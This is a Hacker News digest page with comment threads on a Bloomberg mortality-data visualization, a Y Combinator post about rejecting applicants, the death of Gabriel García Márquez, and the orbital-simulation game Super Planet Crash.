About three or four slides in you get the take-away message, which is often missed in discussions about mortality here on Hacker News: "If you divide the population into separate age cohorts, you can see that improvements in life expectancy have been broad-based and ongoing." And this is a finding that applies not only to the United States, but to the whole developed world. I have an eighty-one-year-old mother (born in the 1930s, of course) and a ninety-four-year-old aunt (born in the 1920s) and have other relatives who are quite old and still healthy. Life expectancy at age 40, at age 60, and at even higher ages is still rising throughout the developed countries of the world.[1] An article in a series on Slate, "Why Are You Not Dead Yet? Life expectancy doubled in past 150 years. Here's why."[2] explains what incremental improvements have led to better health and increased life expectancy at all ages in the United States. The very fascinating data visualizations in the article submitted today highlight the importance of research on preventing suicide, reducing drug abuse, and preventing senile dementia such as Alzheimer disease, which is where some of the next progress in prolonging healthy life will have to come from.

Professional demographers try to think ahead about these issues, not least so that national governments in various countries can project the funding necessary for publicly funded retirement income programs and national health insurance programs. Demographers have now been following the steady trends long enough to make projections that girls born since 2000 in the developed world are more likely than not to reach the age of 100,[3] with boys likely to enjoy lifespans almost as long. The article "The Biodemography of Human Ageing"[4] by James Vaupel, originally published in the journal Nature in 2010, is a good current reference on the subject. Vaupel is one of the leading scholars on the demography of aging and how to adjust for time trends in life expectancy. His striking finding is "Humans are living longer than ever before. In fact, newborn children in high-income countries can expect to live to more than 100 years. Starting in the mid-1800s, human longevity has increased dramatically and life expectancy is increasing by an average of six hours a day."

I was in a local Barnes and Noble bookstore back when I was shopping for an eightieth birthday gift (a book-holder) for my mom, and I discovered that the birthday card section in that store, which is mostly a bookstore, had multiple choices of cards for eightieth birthdays and even for ninetieth birthdays. We will be celebrating more and more and more birthdays of friends and relatives of advanced age in the coming decades.

[1] http://www.nature.com/scientificamerican/journal/v307/n3/box...

[2] http://www.slate.com/articles/health_and_science/science_of_...

[3] http://www.prb.org/Journalists/Webcasts/2010/humanlongevity....

[4] http://www.demographic-challenge.com/files/downloads/2eb51e2...

2
wtvanhest 14 hours ago 1 reply      
The data is interesting, but somewhat difficult to draw conclusions from without considering how different rates are impacting other rates. What is really noteworthy here is the approach to showing the data. It's effortless to scroll through.

Here are some things I noticed after the fact:

1. I naturally wanted to finish the presentation and was compelled to click to see if there were any amazing insights.

2. After the fact, I have no idea how I even advanced the presentation, all I knew was that I clicked something. It was 100% natural.

It fully pulled me in. I can't remember if there were ads on the sides or more information.

[added] I went back and looked at it again and I think what made it so flawless is that the first page gave me no option but to click the right hand arrow which taught me what to look for. I clicked the right arrow, and then I knew to click it again to advance. The progress dots on the top let me know that I didn't have much time left. Really amazing work here.

3
webwright 13 hours ago 3 replies      
Ugh, the fact that many of these charts show raw # of deaths versus deaths/100k really masks how much things have improved. In 1968, the population was 64% of our current population... So a flat line is actually a pretty massive improvement.
4
minimax 14 hours ago 0 replies      
If you liked this, you might enjoy some of their previous articles. It's interesting to see them iterating on the technique.

Consumer spending (from last December): http://www.bloomberg.com/dataview/2013-12-20/how-we-spend.ht...

Housing prices (from February): http://www.bloomberg.com/dataview/2014-02-25/bubble-to-bust-...

5
brudgers 12 hours ago 4 replies      
"And, how do suicide and drugs compare to other violent deaths across the population? Far greater than firearm related deaths, and on the rise"

In 2010, 19,392 of the 38,364 suicides were "by discharge of firearm" [the same term used for classifying 11,078 homicides and 606 accidental deaths]. Seems a bit odd that the report classifies the accidents and homicides as "firearm related deaths" but the suicides as unrelated.

From a public health perspective, a 50% reduction in suicide by firearm would save more lives than the complete elimination of HIV deaths or cervical cancer deaths or uterine cancer deaths.

http://www.cdc.gov/nchs/data/nvsr/nvsr61/nvsr61_04.pdf

6
ef47d35620c1 12 hours ago 2 replies      
I heard once that one cigarette a day as a stress relief may actually extend your life. I'm not sure about that, but I do think we need to be mentally and emotionally healthy too. Our health and well-being is not purely physical.

I would think that happy people who are not constantly under stress live longer.

7
mberning 14 hours ago 6 replies      
Any info on how they create these visualizations? Are they using any particular libraries or frameworks?
8
imgabe 14 hours ago 1 reply      
So in 1968 all age cohorts had the exact same mortality rate of 100 per 100,000? Why is that?
9
ABNWZ 14 hours ago 4 replies      
"This is particularly striking since cancer and heart disease - the two biggest killers for 45-54 yr olds - have become much less deadly over the years"

Except your graph shows that cancer death rates have increased by almost 20% from 1968-2010... Am I missing something here?

10
richev 14 hours ago 4 replies      
Very nice graphs and visualisations, but am I alone in finding most of them hard to understand?
11
drinkzima 7 hours ago 0 replies      
Pretty incredible user experience on mobile, haven't seen graphs that look that good in a mobile web browser (and interactive no less).
12
rpedela 14 hours ago 4 replies      
The part about suicides is pretty interesting and perplexing. Are there any insights into why the rate has increased?
13
Pxtl 13 hours ago 0 replies      
Maybe we should have a war on drugs, then. I'm sure that would work.

Getting guns out of our communities is probably easier than getting drugs out of them, not to mention mental conditions that lead to suicide.

14
kafkaesque 11 hours ago 1 reply      
I got the presentation's/graph's main takeaway, but did anyone else notice that women's mortality rate hardly changed since 1968? Why was this, I wonder? Is this a population thing or because women were mostly kept inside doing safer house duties or what?
15
dclowd9901 12 hours ago 0 replies      
If whomever contributed to the code on this is around, could you give us some insight into building this app, or do a writeup? I'd be super interested to see how you designed/architected such a smooth and experience.
16
infosample 13 hours ago 4 replies      
Black males die at such a higher rate from AIDS. Are they having that much more unprotected sex, taking that many more drugs from dirty needles, or getting that much inferior treatment than the general population?
17
cheetahtech 14 hours ago 3 replies      
It's interesting to see that drugs and suicide are the highest causes of death, well over that of guns. But we seem to be progressing more towards a drug open world and gun closed world. Do you see the Irony?
18
bittercynic 12 hours ago 1 reply      
I couldn't figure out any way to navigate without using the mouse.
19
dmritard96 13 hours ago 0 replies      
"progress stopped in the mid 1990s"

maybe i am missing something but it seems like the mortality rate would be a lagging indicator of progress hence progress would have "stopped" earlier?

Not that I necessarily would say it stopped at all...

20
matthewisabel 13 hours ago 1 reply      
I created a visualization on a similar topic that looked at mortality rates state-by-state using the 2010 census data. It was on HN about six months ago.

http://www.matthewisabel.com/projects/deathrates/geographic....

21
devanti 13 hours ago 0 replies      
Surprised how nice the visualization looks, given how ugly the Bloomberg terminal is
22
0003 14 hours ago 1 reply      
Any reason why the 75-84 group was out living the 85+ group until recently?
23
RobotCaleb 13 hours ago 0 replies      
That's neat, but it's very hard to tell the colors apart.
24
fophillips 14 hours ago 0 replies      
Need some error bars on that data.
25
brokenrhino 13 hours ago 0 replies      
I wonder is the drop in car accident death caused by;

1) Cash for clunkers taking old dangerous cars off the road so the fleet consists of more newer safer cars

or;

2) People driving less since the recession and the gas price increases
26
jon_black 9 hours ago 1 reply      
Everyone knows that the most Americans actually die in terrorist attacks. How else can you justify such emphasis on fighting it? Hmmmmmmmm.
27
dragontamer 13 hours ago 0 replies      
<script src="global/js/jquery-1.8.3-min.js" charset="utf-8"></script>

<script src="js/modernizer.2.7.1.js" charset="utf-8"></script>

<script src="js/underscore.1.5.2.js" charset="utf-8"></script>

<script src="global/js/less.js" charset="utf-8"></script>

<script src="global/js/d3.v2.js" charset="utf-8"></script>

<script src="js/jquery.cycle.all.js" charset="utf-8"></script>

It looks like the majority of this visualization was from the D3.js library. I've been seeing more and more web-documents of this style, it must be because of the rise of D3.

28
EGreg 12 hours ago 0 replies      
"That's why total deaths in the 75+ category has stayed constant"

I thought that was a particularly funny statement. Reminded me of the onion: http://www.theonion.com/articles/world-death-rate-holding-st...

29
joshuak 14 hours ago 4 replies      
So to achieve longevity escape velocity [0]

1. Don't have unprotected sex if you're less than 44 years old.

2. Don't kill yourself, or do drugs, if you're less than 54 years old.

3. Invest heavily in heart disease, cancer, and alzheimer's research.

[0] http://en.wikipedia.org/wiki/Longevity_escape_velocity

30
ihodes 14 hours ago 5 replies      
Probably the four most important things you can do to change your odds of making it past 80 are:

    1. Not smoking.
    2. Eating healthily (fiber, vitamins, low sugar; this is a nascent field).
    3. Exercising regularly.
    4. Wearing sunscreen and minimizing sun exposure.

These will collectively reduce your risk of common cancers significantly, as well as protect against heart disease. Additionally, they can help strengthen your immune system and body against other diseases that e.g. the malnourished or obese would be more likely to succumb to.

19
The Worst Part of YC samaltman.com
325 points by dmnd  2 days ago   106 comments top 26
1
zt 2 days ago 5 replies      
While I was in college, I was put on a committee to choose a new Director of Admissions. One of the internal candidates said during his interview: "There is a good reason that everyone who is accepted gets in, but there is not a good reason why people are rejected."

In many ways that seems obvious. To get in you have to have something going for you. To not get in you don't have to do anything wrong, you just have to not have a thing that does get you in. It would be just as hard for my college to write high school seniors a letter saying, well, you were 2nd in your class and had a 1500 but nothing stood out as would be for YC to write people direct feedback at scale. What would it really mean? How do you action that? No special sauce isn't really feedback. You can't point to anything wrong other than you can't point to anything great.

This has proven true for me in the admissions processes I've gone through on the other side: whether at a consulting firm, or Stripe, or Standard Treasury, or Echoing Green (I read semi-finalist apps). Most people self-select to apply for good and just reasons but some people really excite you and some people don't. Some people just have that something special, and the people who don't don't really have anything wrong with them.

So to me this commentary rings true and is honestly put.

2
wildermuthn 1 day ago 6 replies      
At West Point, I was one of ten cadets in my class of one thousand to make the parachute team. For some reason, the parachute team had become a symbol-status and a fast track to cadet success.

What interests me the most is that I had no idea, no clue, that the skydiving team was a fast-track to promotion. I just wanted to jump out of planes. That wasn't the case with many of my teammates. We had some great talent on the skydiving team, the most talented men and women at West Point. But some of them hated jumping out of planes, and they did poorly.

Sama writes that the number and quality of YC applications has risen. That might not be a good thing. Talent and ambition aren't the greatest indicators of startup success.

I don't think it's a coincidence that Dropbox, Reddit, AirBnb, Justin.tv, Loopt, and Stripe all came within the first few years of YC's existence, and that YC's more recent companies haven't taken off in the same way. It might be because immensely talented people see YC as their avenue to success.

If being immensely talented and ambitious was the prime requisite for startup-success, then YC would be in a great position. But as I understand it, having talent and ambition don't matter as much as having a determined, cohesive, and visionary team.

3
tdullien 1 day ago 1 reply      
Perhaps as a "cheer up" story: We applied to YC in their very first batch and got rejected. It is unclear what the reasons were -- but there were many reasons why it was understandable for YC to reject us. Among other things, the company had already been incorporated in Germany, we already had a few customers, we had decidedly nonexistent mass-market potential, the entire company was a bad idea from a purely business perspective, and just in almost every imaginable way did not fit the mold.

This did not deter us from continuing; our company was profitable already, and we worked our butts off for the next few years (without any reasonable perspective of ever getting acquired, or even growing the company to be big). The work was interesting, and for a company that size, we had a surprisingly large impact (indirectly) on the wider world, but it was heavy toil with little reward.

Either way - history then shifted under our feet, and it turned out in 2010/2011 that we had the combination of technology and team that out of a sudden had become pretty important to Google, and then after a long and painful negotiation process, we got acquired in 2011. Not a gangbusters acquisition by any stretch of the imagination, but one that worked out nicely for everyone involved.

So perhaps the takeaway from this is: YC is great, but perhaps the great redeeming quality of modern capitalism is that you do not require gatekeepers in order to be successful. "You play shit that they like, and people will come, simple as that." - e.g. if you build a product that people like, people will give you money to build more of that product. Decentralized decision-making and the ability to bootstrap with nothing but a compelling product may be the one thing that led to our current economic system to out-compete the others.

When we started the company, I wanted to build X. This was a huge endeavor, and I knew that on the way to X I'd need to build Y and Z; so I ended up building Z first, then used income from Z to bootstrap development on Y, then I got sidetracked a bit on B because we found a surprising application of our technology to a different field, and just when I was about to get back to X, we got acquired principally for B and Z. So up until today, we have made very little progress on X itself, but that doesn't matter :-)

So if you're rejected from YC, don't despair. Use it to re-examine what you're doing, understand that investment is like dating (some people are just not made for each other, and it will end in horror if you pretend to be someone you are not), and then channel your disappointment into velocity :-P

(PS: pg, if you folks have any notes whatsoever on reasons for rejection in the first YC batch, I would love to have more background info - but it is also pretty understandable if no memory at all exists ;)

4
zbruhnke 2 days ago 1 reply      
It's nice to see the side of investors that still have a passion for startups so much so that they feel sad when they reject people.

It often feels like no one in that world has empathy.

For the ones getting rejection emails tonight don't sweat it. I got into YC on my Third try and it was worth every rejection.

We're building a company now and spent months getting rejected about raising a seed round before suddenly becoming one of the "hot" companies with investors and being in a position to turn the same people who were turning us away down for a change.

All this to say Sam is right. If you're working on something, there is traction and/or you truly believe in it don't give up.

The only validation to worry about at this stage of the game is user validation.

Talk to Users. Write Code.

Best of luck with whatever you're building and if I can ever be of help feel free to email me (email in profile)

5
rafeed 2 days ago 1 reply      
Rejection is inevitable. If you're not rejected now, somewhere down the road you will be. If you haven't been rejected, get practice in getting rejected. If you have been rejected, feel the frustration and use it as motivation to prove whoever rejected you wrong.

The best analogy I can find for this is that applying to YC is like trying to pick up a girl or asking her out on a date. (I know many of us have yet to try, too). Get over the fear of rejection, and put yourself out there. Will your way to success. YC is like the smartest, most beautiful woman with the amazing personality everyone falls in love with (well, there's always the haters). Don't give up. Exercise, eat right, sleep, and strive to be better. You never know, one day that beautiful woman might actually say yes.

(To all the women on HN, replace girl/woman with guy/man and beautiful with handsome.)

6
eggbrain 1 day ago 0 replies      
Back about 5 years ago, a prominent VC behind TechStars came to my college and talked about entrepreneurship. I was so enamored that I decided I wanted to be an entrepreneur and apply to their incubator program.

I applied about 5 times with various ideas to various programs (Boulder, Seattle, New York). I got close once -- I was a "finalist" for the Seattle program (Top 30), but didn't get chosen as the top 10.

Each time left me pretty crushed. But I decided early on that I could sit around and feel bad about myself, or I could use it to become better. After each time I was rejected, I contacted the head of the incubator and thanked them for their time, and if they could give me any tips towards success. And more often than not, I got responses that helped me become a better entrepreneur.

The first rejection is always the hardest. And so is the second, the third, the fourth, and the fifth. But Edison is widely quoted as saying:

  "I have not failed 1,000 times.  I have successfully discovered 1,000 ways to NOT make a light bulb."
Despite what you may think of Edison, I try to take the same mentality. To those who got rejected -- think of it not as the end, but as the beginning. You'll enjoy the ride if you do.

7
dctoedt 1 day ago 0 replies      
FTA: [I]t was really striking how much higher the average quality of applications was for this batch compared to any previous batch. Most of the partners independently mentioned this to me.

To me that was the most interesting part of the article.

8
rvivek 2 days ago 1 reply      
We got into YC only the 3rd time in summer 2011; applied for the two earlier batches. Both of our earlier applications had bad ideas and very little traction.

So, don't give up.

9
VaedaStrike 2 days ago 1 reply      
As I go through the rest of my life I'll likely be applying just about every cycle simply for the way applying focuses my mind and energies.

And the funniest thing...I get more excited each time. Rejection after rejection, I get more and more certain that I'm getting closer and closer. Totally counter-intuitive from what I thought, both the excitement side of it and the applying for the 4th or 5th time... :) "Y" I ask you...

10
ipince 1 day ago 4 replies      
It's hard (or impossible) to give detailed feedback to every applicant. But maybe telling them roughly in which bucket they fell ("shortlist", "pretty good", "okay", "stopped reading after 30s") would be useful.
11
davidw 1 day ago 0 replies      
Just as the ever-increasing low cost accessibility of technology has made YC possible in that you can give someone just a little bit of money to build something, self-funded startups are also becoming possible for more and more things. Here are some resources:

http://discuss.bootstrapped.fm/

https://twitter.com/search?src=typd&q=%23microconf - lots of information on the recently concluded MicroConf with patio11 and many others from HN.

http://www.startupsfortherestofus.com/

And Rob's book, which is a great starting point: http://www.amazon.com/Start-Small-Stay-Developers-Launching/...

Granted, bootstrapping is not viable for some things, but for many others, it's a good path.

12
pincubator 1 day ago 1 reply      
We all know that it's almost impossible to provide custom feedback to those who are not selected. But is it also impossible to point out what portion of our application went wrong?

E.g. there might be 4-5 checkboxes for reviewers:

- Ideas are not clear

- Ideas are not profound/original

- Not profitable

- No demo

...

So at least we could know what went wrong. As most of the applicants, I think my idea was pretty cool and I am not sure what part I screwed up.

13
maximgsaini 15 hours ago 0 replies      
That is the Best Part of YC!!! If Albert Einstein had not been 'rejected' for 2 years, we might not have had that revolutionary glimpse into our own world (just saying). He might've accepted those stale old ideas by joining the academia of the time. Rejections force you to improve, rejections liberate you from previously held ideas, rejections force you to jump higher.

Inside YC, you help 50 companies. Outside YC, you help 2950 companies by giving your opinion on their performance. Some of these 2950 companies will someday blow everyone away!! They will give everyone a glimpse into a new world, just like the greats of the past did. And the likes of YC will be thanked, because every rejection will have some contribution in shaping them.

14
hyp0 1 day ago 0 replies      

  If you're working on something that users love,
  you like working on it, and
  you have a plan for how to build a business around it

Even with the mad hiring of new partners, there still aren't enough to take on all the applicants they'd like to (I assume that's the key resource bottleneck, not funding or space etc) - and the number and quality of applicants are increasing. It sounds like the YC we know so far may have just been the beginning.

A great release, both in facts and vibe; Elon standard.

15
fayyazkl 1 day ago 0 replies      
The best I think that can be done is to tell objectively why you didn't fund a company so either they focus on resolving those issues or at worst quit asap or move to a new idea. I don't know how much feedback is provided currently but it is immensely important even to those who got selected so they can focus on their strengths and fix their issues
16
mfrank 17 hours ago 0 replies      
Interesting that this is pretty different than what other VCs say is the worst part of their job: http://www.quora.com/Venture-Capital/What-is-the-worst-part-...
17
exo_duz 1 day ago 0 replies      
Whilst not everyone can get in. Best of luck to all that were accepted. We'll try again in 6 months.
18
sbuccini 2 days ago 1 reply      
Will we be notified regardless of our application's status?
19
jameshk 1 day ago 0 replies      
For everyone who gets rejected: don't give up. Keep working on your startup and apply next batch, even Drew Houston got rejected the first time.
20
hotpockets 2 days ago 0 replies      
I always think about the bubble groups. Darn it would suck to be right on the bubble. Maybe they could create a separate, remotely managed cohort of bubble groups, that are adopted by HN.
21
650REDHAIR 2 days ago 0 replies      
How many companies that reapply get accepted during the next batch?
22
tpae 2 days ago 0 replies      
This. This is one of the biggest reasons why I want to get in so bad. Never give up. Thank you for this!
23
notastartup 2 days ago 1 reply      
What is the benefit of joining YC? If you are just making a profit and reinvesting some of that into the business, do you have an advantage of joining YC? Why should you give up a piece of your action?
24
datamingle 2 days ago 1 reply      
15 minutes old, with 1 comment: #1 post on Hacker News.
25
cynic2 1 day ago 0 replies      
Pass me a bucket. Fund or don't fund. You didn't pick the companies you didn't pick for a reason. Don't be warm and fuzzy about it. Having a Kumbaya moment is just patronising -- and I'm sure you didn't mean it that way, but that's how at least one person perceives it.
26
mempko 1 day ago 0 replies      
The worst part of YC is that they make groups of people compete with each other, instead of cooperate. The results are startups that have mediocre ideas that fill the needs of people who have money. If the phrase "vote with your dollar" is true, then it becomes obvious that the services and products society creates will cater to those with the most money.
20
Gabriel García Márquez, Literary Pioneer, Dies at 87 nytimes.com
323 points by antr  7 hours ago   87 comments top 20
1
simonsarris 6 hours ago 5 replies      
Oh my. A paragon of magical realism and my second favorite author. Rest in peace.

Liking storytelling alone is sometimes not enough to like Marquez, you have to love language too. He uses (some might say abuses) language to impact his storytelling, often using incredibly long, convoluted sentences to weave his narrative. It can be hard to follow, sometimes intentionally, but I find it enormously satisfying to read and follow along with his brain. Like slowly drinking a maple syrup of words.

One of the best examples is the first 15 or so[1] pages of Autumn of the Patriarch[2], where the narrator winds this thread of what has happened slowly, using sentences that span pages, until you realize a shift from what has happened to a sort of what is about to happen. Then a fist slams on the table and the realization strikes you that the first part of the description was a kind of set up, this beautiful ruse. I wish I could be more descriptive but it would give away the delight. It's a great book about terror and despotism.

Marquez is not the kind of thing you can read in a noisy environment. At least I can't. I adore him so much. I could write a eulogy for days.

If you've never read him, please take a moment to read one of my favorite short stories, A Very Old Man With Enormous Wings

http://simonsarris.com/lit/a-very-old-man-with-enormous-wing...

(I've hosted a copy of it (and many more short stories) for ages because most of the copies on the web are plagued with ads and miserable formatting)

If One Hundred Years of Solitude seems too long for you, I urge you to look into some of his very excellent shorter books, such as Autumn but also Of Love and Other Demons[3] and Love in the Time of Cholera.[4]

(Chronicle of a Death Foretold is even shorter, but I do not recommend it as the first Marquez book you read!)

[1] It could be the first 10 or 30 pages, it's been several years, but I am certain it's one of the better (and shorter) examples of his style.

[2] http://www.amazon.com/dp/0060882867

[3] http://www.amazon.com/dp/1400034922

[4] http://www.amazon.com/dp/0307389731

2
rjtavares 7 hours ago 8 replies      
"Many years later, in front of the firing squad, colonel Aureliano Buendía would remember that distant afternoon his father took him to see ice."

Best opening line of a book ever. RIP.

3
chimeracoder 6 hours ago 0 replies      
I read six of Garcia Márquez's stories in school - my favorite was "The Handsomest Drowned Man in the World"[0] ("El Ahogado más Hermoso del Mundo"). If you're looking to get a taste of his writing but don't have time to read an entire book, this short story captures his style very well.

In a similar vein is "An Old Man with Very Enormous Wings" [1] ("Un señor muy viejo con unas alas enormes"), which was referenced in R.E.M's music video for "Losing My Religion"[2]

[0] https://hutchinson-page.wikispaces.com/file/view/The_Most_Ha...

[1] http://www.ndsu.edu/pubweb/~cinichol/CreativeWriting/323/Mar...

[2] https://www.youtube.com/watch?v=if-UzXIQ5vw

4
tdees40 6 hours ago 0 replies      
My favorite Marquez story is that he never used adverbs ending in -mente, so he called his English language translator (Edith Grossman) and requested that she not use any adverbs ending in -ly.
5
jpdlla 19 minutes ago 0 replies      
My first favorite novel in Spanish was by GGM, "Relato de un náufrago" (The Story of a Shipwrecked Sailor). Many don't know but the full title is actually "Relato de un náufrago que estuvo diez días a la deriva en una balsa sin comer ni beber, que fue proclamado héroe de la patria, besado por las reinas de la belleza y hecho rico por la publicidad, y luego aborrecido por el gobierno y olvidado para siempre." (The Story of a Shipwrecked Sailor: Who Drifted on a Liferaft for Ten Days Without Food or Water, Was Proclaimed a National Hero, Kissed by Beauty Queens, Made Rich Through Publicity, and Then Spurned by the Government and Forgotten for All Time.)
6
russell 6 hours ago 0 replies      
"One Hundred Years of Solitude" was the only book that everyone in my family ever read, me, my wife and my three kids.

"Mr. García Márquez, who received the Nobel Prize for Literature in 1982, wrote fiction rooted in a mythical Latin American landscape of his own creation, but his appeal was universal. His books were translated into dozens of languages. He was among a select roster of canonical writers, Dickens, Tolstoy and Hemingway among them, who were embraced both by critics and by a mass audience." from the article.

But the article doesn't begin to do the book justice. The mythology is Colombian but it all is real to the reader. It is very worthwhile to read One Hundred Years along with a literary biography of Marquez. It was a wonderful experience for me. BTW my taste is purely science fiction.

7
r4pha 6 hours ago 0 replies      
I absolutely adore this man. I was lucky to be given a Portuguese-translated copy of "one hundred years of solitude" at the age of 16. I read it back then and loved the story itself and especially the beautiful writing style. About four or five years later I read it again in the original (even though I don't speak Spanish very well) and was even more amazed about the beauty of it and about how _my_ interpretation of it changed. I loved everything I have ever read from him, but I loved "one hundred years" so much I even feel ashamed of trying to use my own words to describe it.
8
maceo 2 hours ago 1 reply      
Let's not forget that GGM was a life-long socialist and a supporter of the Cuban revolution.

He spent many years living in Cuba and he considered Castro to be one of his best friends. He was a firm supporter of Chavez, and looked forward to the day that Simon Bolivar's idea of a united Pan-America would be realized. Because of this, he was prohibited from entering the US during the Reagan administration.

As much as I love his works of fiction, my favorite book of his is the first volume of his autobiography, Living to Tell The Tale. I've been patiently waiting for news about volume 2 and 3 ever since the first one came out in 2002. I have never heard anything about these -- whether they were ever written remains a mystery. RIP to a magnificent man who brought so much pride to the people of our scarred continent.

9
paul_f 7 hours ago 5 replies      
Can someone provide a quick summary of what it was that made Marquez so prominent? I had not known much about him at all.

FYI, if like me, you have trouble accessing the article, and using Chrome, right-click and open in an incognito window.

10
3am 6 hours ago 2 replies      
Oh no... GGM was an underappreciated author in the non-Spanish-speaking world (in spite of wonderful, gifted translators... he was just an intrinsically difficult author to translate because of the poetic quality of his writing IMHO). Cien Anos de Soledad was one of the first non-trivial, non-English books I read. RIP.

edit: okay, removed 'really'.. I think he was underappreciated on a popular level, even though he was very well appreciated on a critical level.

11
noname123 6 hours ago 2 replies      
Can someone tell me what is the theme of "One Hundred Years of Solitude" as applied to modern society? I read the book awhile ago and appreciated greatly the various character sketches.

Unfortunately, the literary criticism that I sought out back then at liberal arts college, focused mostly on the metaphor of the European colonialism on Latin America (industrialization of the town with the rubber-plant, and the subsequent massacre of the residents after some kind of rubber-plant revolution, consequences of military rule and violent overthrows as embodied by Colonel Buendia and circular nature of the history, Spanish colonialism past long felt after Latin America became independent).

Tbh, I'm not really interested in the whole multiculturalism and ethnic studies rehashing the white guilt trope. However, I find the obsession of the various characters fascinating, the scientific obsession of the original patriarch that eventually descended into madness, Colonel Buendia making little gold fishes, the incestuous natures of the whole family, some ethereal nympho character that doesn't speak a word and then one day transcends to heaven much to the horror of the venerable matriarch. What is your interpretation of the book?

12
maceo 2 hours ago 0 replies      
In his autobiography he tells a story I love.

While writing 100 Years of Solitude he listened to The Beatles' A Hard Day's Night album on repeat. After the book was published he received a letter from a group of Mexican college students who asked him if he was listening to A Hard Day's Night when writing the book, because they felt the album in his words.

13
noname123 6 hours ago 4 replies      
OT but tangential: any magical realism authors to read? So far, I got Marquez, Jorge Luis Borges and Murakami. And preferably recommendation should be good to provide philosophical consolation to a code monkey worker-bee in the capitalist society.
14
ch4s3 6 hours ago 1 reply      
And now we may never know why Mario Vargas Llosa punched him in the face.
15
KhalilK 7 hours ago 1 reply      
His books were part of my adolescence, but "One Hundred Years of Solitude" was the essence of my formal education, I am sad he died but I am utterly glad he's lived.
16
dvidsilva 3 hours ago 0 replies      
I'm so 'proud' to see this here, hard to think of something to say so I'll put one of my fav quotes from him:

"She discovered with great delight that one does not love one's children just because they are one's children but because of the friendship formed while raising them."

17
deckardt 5 hours ago 1 reply      
This is one of the reasons I keep reading Hacker News. It's a great source for cutting-edge tech news; more importantly, it's also a great source for important news.
18
camus2 6 hours ago 0 replies      
As a programmer and a poetry/book lover, it is sad news, please have a 5min break from whatever code you are writing (on your free time of course) to check this author out!
19
rafaelvega 2 hours ago 0 replies      
I once met this American guy who told me in fluent Spanish that he went and studied the Spanish language after reading one of GGM's books because he wanted to read it in its original language.
20
iraikov 2 hours ago 0 replies      
His writing was like poetry and song, all in one. Second best opening after "A Hundred Years of Solitude":

"It was inevitable: the scent of bitter almonds always reminded him of the fate of unrequited love. Dr. Juvenal Urbino noticed it as soon as he entered the still darkened house where he had hurried on an urgent call to attend a case that for him had lost all urgency many years before. The Antillean refugee Jeremiah de Saint-Amour, disabled war veteran, photographer of children, and his most sympathetic opponent in chess, had escaped the torments of memory with the aromatic fumes of gold cyanide."

21
Show HN: Super Planet Crash stefanom.org
317 points by CarolineW  2 days ago   118 comments top 46
1
todayiamme 2 days ago 5 replies      
I am usually quite resistant to games - even 2048 bounced off of me with little effect - but something about the idea of creating solar systems and playing around with nature's laws is deeply appealing and I just spent 15 minutes figuring out how to construct a system which can get as many points as possible without imploding. (hint: large multipliers. Here's an initial attempt that I intend to refine once I'm done with work; http://www.stefanom.org/spc/?view=2823906 )
2
stefanom 2 days ago 10 replies      
I am the developer of the game (StefanoM). I'm glad people are enjoying the game, and I'm sorry for the downtime -- I did not expect it to become this popular.

If you have any improvements or suggestions (especially on the programming side!), please email me directly.

Update: As an astronomer (and not a professional programmer), being on HN makes me super proud. Thank you!

3
oldmanjoe 2 days ago 0 replies      
Nice. Unfortunately my solar system was stable for about 40 years and then descended into a nightmarish world of Earth bouncing around the solar system in what would have been a horrific experience for the citizens of the planet. On the plus side the visuals from the multiple planets veering close to destroying it would have been a sight to remember. Well, remember for the short while that remained before the atmosphere either froze, was burned away by the sun or stripped by the gravitational field of a giant planet.
4
brownbat 5 hours ago 0 replies      
Not sure how much of an achievement this is, but I was a little proud of my co-orbital pair, introduced at around 37 years:

http://www.stefanom.org/spc/?view=5188442

5
wintersFright 2 days ago 5 replies      
does this imply that most solar system arrangements are unstable and we are lucky in ours?
6
lmm 2 days ago 0 replies      
Is there any way to delete the first planet? It seems like there's a motivation to keep refreshing until it spawns somewhere convenient.
7
kylec 2 days ago 1 reply      
3 bodies, 94.9 million, 500 years:

http://www.stefanom.org/spc/?view=2987733

Surprisingly stable, given the Earth-sized planet's erratic orbit.

8
guard-of-terra 2 days ago 0 replies      
Start with an accretion disk, it will evolve into a stable system in a few My.
9
devinmontgomery 2 days ago 0 replies      
So I used this to answer the obvious question: life would suck on Tatooine, with an earth-sized planet shooting in and out of the habitable zone. Then I found this: http://www.newscientist.com/article/dn23051-only-the-toughes....
10
supahfly_remix 1 day ago 0 replies      
Looks cool. How does the program keep errors from numerical approximations to the inverse square gravity law from blowing up?
11
TwoBit 2 days ago 0 replies      
It doesn't work for me with the latest Firefox. The interface won't let me do anything. Maybe the server is simply overloaded, because it's almost unresponsive and takes minutes to load the "high scores." It seems to work under Internet Explorer though.
12
munchor 2 days ago 0 replies      
This needs a few "overflow-x/y: hidden", but other than that it's a great game.
13
owenversteeg 2 days ago 0 replies      
I put 11 Earths in a row in very similar orbits. For some strange reason, some of them went out after ~100 years and made new, stable orbits. http://www.stefanom.org/spc/?view=2980198
14
Kiro 2 days ago 2 replies      
137,479 points over 500.2 years by just clicking out 12 earths randomly in the habitable zone and then set speed to max. Not sure I understand this.
15
m_mueller 2 days ago 1 reply      
I always wanted to know how it's possible to have a dual star system with planets in between the stars. It's easier than I thought[1]. I guess the heavier the second star, the further it must be from the inner planets.

[1] http://www.stefanom.org/spc/?view=2843935

16
higherpurpose 2 days ago 1 reply      
I put a dwarf star in the middle of the Sun (it placed it right next to it), and while it does destabilize the sun a bit, the rapid rotation of the dwarf star stabilizes it overall. The planet doesn't rotate in a uniform way around the two stars either, but it also seems stable overall, thus breaking the 500 year limit, at least:

http://postimg.org/image/jepystvbz/

17
phaemon 2 days ago 1 reply      
My best after a few attempts is:

500 Years, Score: 33,445,876, 7/12 bodies

See http://www.stefanom.org/spc/?view=2850139

18
golergka 2 days ago 0 replies      
I've managed to do that with a system that I was trying to create to break it: http://www.stefanom.org/spc/?view=2830379
19
metaphorm 2 days ago 1 reply      
LOVE THIS. still trying to do 2 dwarf stars. is it even possible?
20
gojomo 2 days ago 0 replies      
Can't load but the mere chance it's anything like either the ancient coin-op arcade game, 'Mad Planets', or the recent Flappy Bird variant, 'Flappy Space Program', makes me like it already.
21
rajahafify 2 days ago 1 reply      
2 suggestions. 1) Make the new game not a full page refresh. 2) Remove the first planet.
22
jpasden 2 days ago 0 replies      
So in "Super Planet Crash" the planets can't actually collide? I pumped 11 super-Earths into essentially the same orbit (in the habitable zone), and they seemed to just overlap and do just fine. When I lose, it's always because a planet flies off.
23
rootlocus 2 days ago 0 replies      
According to Kepler's law of planetary motion, the orbit of a planet is an ellipse with the Sun at one of the two foci. Although circles are ellipses, having the planets start with a circular motion makes the system simpler but somewhat unrealistic.
24
morganherlocker 2 days ago 1 reply      
